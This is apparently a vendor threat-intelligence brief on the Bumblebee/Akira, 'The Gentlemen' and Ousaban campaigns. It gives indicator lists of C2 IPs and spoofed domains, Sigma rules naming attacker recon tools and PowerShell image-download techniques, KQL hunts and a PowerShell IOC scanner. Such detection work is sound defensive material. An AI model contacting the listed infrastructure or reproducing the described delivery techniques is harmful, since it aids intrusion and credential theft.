Recent intelligence from AlienVault OTX highlights a convergence of high-risk activities spanning Ransomware-as-a-Service (RaaS), sophisticated loaders, and regional banking trojans. The data indicates three distinct but equally dangerous campaigns:
- Bumblebee to Akira Pipeline: A supply-chain style attack leveraging SEO poisoning to distribute trojanized IT management tools (specifically ManageEngine OpManager), leading to Bumblebee loader infections and ultimately Akira ransomware.
- The Gentlemen Emergence: A new top-tier RaaS actor "The Gentlemen" is aggressively exploiting internet-facing infrastructure (VPNs/Firewalls) to deploy SharkLoader and Cobalt Strike, utilizing extensive reconnaissance.
- Ousaban Regional Surge: A geofenced campaign targeting the Iberian Peninsula (Spain/Portugal) using the Ousaban banking trojan, delivered via phishing PDFs and steganographic payloads.
Threat Actor / Malware Profile
The Gentlemen
- Type: Ransomware-as-a-Service (RaaS)
- Distribution: Exploitation of vulnerabilities in internet-facing VPNs and Firewalls; potential collaboration with Initial Access Brokers (IABs).
- Payload Behavior: Utilizes SharkLoader for initial payload delivery, followed by Cobalt Strike (S0154) for command and control. Employs custom tools like SharpADWS and NetScan for reconnaissance.
- Persistence: GPO deployment and potentially vulnerable drivers to maintain access.
- Key TTPs: Network traffic capture via
netsh, active directory enumeration.
Bumblebee & Akira
- Type: Loader / Ransomware
- Distribution: SEO Poisoning (BlackHat SEO) targeting IT administrators searching for tools like "ManageEngine OpManager" or "Angry IP Scanner".
- Payload Behavior: Trojanized installers execute Bumblebee (S1039), which facilitates lateral movement and credential dumping. AdaptixC2 is used for command and control before deploying Akira ransomware.
- Persistence: Bumblebee often establishes persistence via scheduled tasks or registry run keys.
Ousaban (Metamorfo)
- Type: Banking Trojan
- Distribution: Phishing emails containing PDF attachments with embedded links.
- Payload Behavior: VBS scripts download steganographic images containing malicious payloads. Performs geofencing checks to ensure the victim is in Spain or Portugal.
- Objective: Credential theft specifically targeting banking information.
IOC Analysis
The provided pulses offer a mix of network and file-based indicators crucial for defense:
- Domains: Includes spoofed legitimate-looking domains (e.g.,
opmanager.pro,angryipscanner.org) used in SEO poisoning, and C2 infrastructure (e.g.,rsat.activedirectory.ds-lds.tools). - IP Addresses: C2 servers for the Ousaban campaign (
162.33.179.46,91.92.240.140,78.40.209.32) and Bumblebee infrastructure (172.96.137.160). - File Hashes: Multiple MD5, SHA1, and SHA256 hashes associated with the trojanized installers, loaders, and payload executables.
Operationalization:
SOC teams should immediately ingest these IOCs into EDR solutions (for file hash scanning) and Firewalls/Proxies (for IP and domain blocking). The specific file hashes provided (e.g., a14506c6... for Bumblebee installer) should be used to hunt for historical presence on endpoints.
Detection Engineering
title: Potential The Gentlemen Reconnaissance Activity
id: 9d0d4b3e-1a2b-4c3d-8e5f-6a7b8c9d0e1f
description: Detects reconnaissance tools and network capture techniques often used by The Gentlemen actors post-exploitation.
status: experimental
date: 2026/07/03
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/6658f3a78f4f462bf05d2bc7
tags:
- attack.reconnaissance
- attack.credential_access
- gentlemen.raas
logsource:
category: process_creation
product: windows
detection:
selection_netsh:
Image|endswith: '\netsh.exe'
CommandLine|contains: 'trace start'
selection_tools:
Image|endswith:
- '\Advanced_IP_Scanner.exe'
- '\netscan.exe'
- '\SharpADWS.exe'
condition: 1 of selection_*
falsepositives:
- Legitimate network troubleshooting by IT admins
level: high
---
title: SEO Poisoning Trojanized Installer Execution
id: a1b2c3d4-e5f6-7890-1234-567890abcdef
description: Detects execution of renamed or suspicious IT tools often targeted in SEO poisoning campaigns leading to Bumblebee.
status: experimental
date: 2026/07/03
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/6658f3a78f4f462bf05d2bc6
tags:
- attack.initial_access
- attack.t1566.002
- bumblebee
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith:
- '\sihost.exe'
- '\explorer.exe'
Image|endswith:
- '\msiexec.exe'
- '\setup.exe'
- '\OpManager.exe'
selection_network:
DestinationHostname|contains:
- 'opmanager.pro'
- 'angryipscanner.org'
condition: 1 of selection_*
falsepositives:
- Legitimate installation of ManageEngine or IP Scanners
level: medium
---
title: Ousaban Steganography Payload Drop
id: f0e1d2c3-b4a5-6078-9012-34567890abcd
description: Detects VBS scripts spawning PowerShell to download images, a technique used by Ousaban to hide payloads.
status: experimental
date: 2026/07/03
author: Security Arsenal
references:
- https://otx.alienvault.com/pulse/6658f3a78f4f462bf05d2bc8
tags:
- attack.defense_evasion
- attack.t1027
- ousaban
logsource:
category: process_creation
product: windows
detection:
selection_vbs:
Image|endswith: '\wscript.exe'
CommandLine|contains: '.vbs'
selection_child:
ParentImage|endswith: '\wscript.exe'
Image|endswith: '\powershell.exe'
CommandLine|contains:
- 'DownloadFile'
- 'Invoke-WebRequest'
CommandLine|contains:
- '.jpg'
- '.png'
- '.bmp'
condition: all of selection_*
falsepositives:
- Unknown
level: high
kql
// Hunt for network connections to known The Gentlemen and Ousaban C2 infrastructure
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteIP in ("172.96.137.160", "162.33.179.46", "91.92.240.140", "78.40.209.32")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteIP, RemoteUrl
| extend AlertMessage = "Connection to known malicious IP detected"
// Hunt for SEO Poisoning domains
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has "opmanager.pro" or RemoteUrl has "angryipscanner.org" or RemoteUrl has "ds-lds.tools"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl
// Hunt for file hashes associated with Bumblebee and Ousaban
DeviceFileEvents
| where Timestamp > ago(30d)
| where SHA256 in ("a14506c6fb92a5af88a6a44d273edafe10d69ee3d85c8b2a7ac458a22edf68d2", "d4eb4ff02df659fdeec17d36b77084627469623bb3c7d16383d257404b52d1c3") or MD5 in ("a746da514c90f26a187a294fda7edc1b", "9321a61a25c7961d9f36852ecaa86f55")
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, MD5
powershell
# IOC Hunt Script for Bumblebee and Ousaban Indicators
# Requires Administrative Privileges
$MaliciousHashes = @(
"a14506c6fb92a5af88a6a44d273edafe10d69ee3d85c8b2a7ac458a22edf68d2", # Bumblebee Installer SHA256
"d4eb4ff02df659fdeec17d36b77084627469623bb3c7d16383d257404b52d1c3", # Ousaban Payload SHA256
"a746da514c90f26a187a294fda7edc1b" # Bumblebee MD5
)
$MaliciousIPs = @(
"172.96.137.160",
"162.33.179.46",
"91.92.240.140",
"78.40.209.32"
)
Write-Host "[*] Scanning for file hashes..." -ForegroundColor Cyan
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | Where-Object {
$_.Length -gt 0kb -and $_.Length -lt 50mb
} | ForEach-Object {
$hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
if ($MaliciousHashes -contains $hash) {
Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
}
}
Write-Host "[*] Checking active network connections for malicious IPs..." -ForegroundColor Cyan
$connections = Get-NetTCPConnection -ErrorAction SilentlyContinue | Select-Object -ExpandProperty RemoteAddress
foreach ($ip in $MaliciousIPs) {
if ($connections -contains $ip) {
Write-Host "[!] ACTIVE CONNECTION TO MALICIOUS IP DETECTED: $ip" -ForegroundColor Red
Get-Process | Where-Object { $_.Id -eq (Get-NetTCPConnection -RemoteAddress $ip -ErrorAction SilentlyContinue).OwningProcess } | Select-Object Id, ProcessName
}
}
Write-Host "[*] Scanning for spoofed domains in DNS cache..." -ForegroundColor Cyan
$domains = @("opmanager.pro", "angryipscanner.org", "ds-lds.tools")
$dnsCache = Get-DnsClientCache -ErrorAction SilentlyContinue
foreach ($domain in $domains) {
if ($dnsCache.Entry -like "*$domain*") {
Write-Host "[!] SPOOFED DOMAIN FOUND IN DNS CACHE: $domain" -ForegroundColor Red
}
}
Response Priorities
-
Immediate:
- Block all identified IP addresses and domains at the perimeter (Firewall/Proxy).
- Scan endpoints for the specific file hashes provided in the IOCs.
- Isolate any devices exhibiting signs of Bumblebee (suspicious installer execution) or The Gentlemen (netsh trace capture).
-
24 Hours:
- If credential dumping (Bumblebee) or banking trojans (Ousaban) are suspected, force a password reset for privileged accounts and users in the Iberian Peninsula or Finance departments.
- Review VPN and Firewall logs for evidence of exploitation (The Gentlemen vector) and patch immediately if vulnerabilities are found.
-
1 Week:
- Implement strict allow-listing for IT management tool downloads to mitigate SEO poisoning risks.
- Conduct user awareness training focused on verifying official sources for software downloads.
- Enhance email filtering for PDFs containing external links (Ousaban vector).
Related Resources
Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.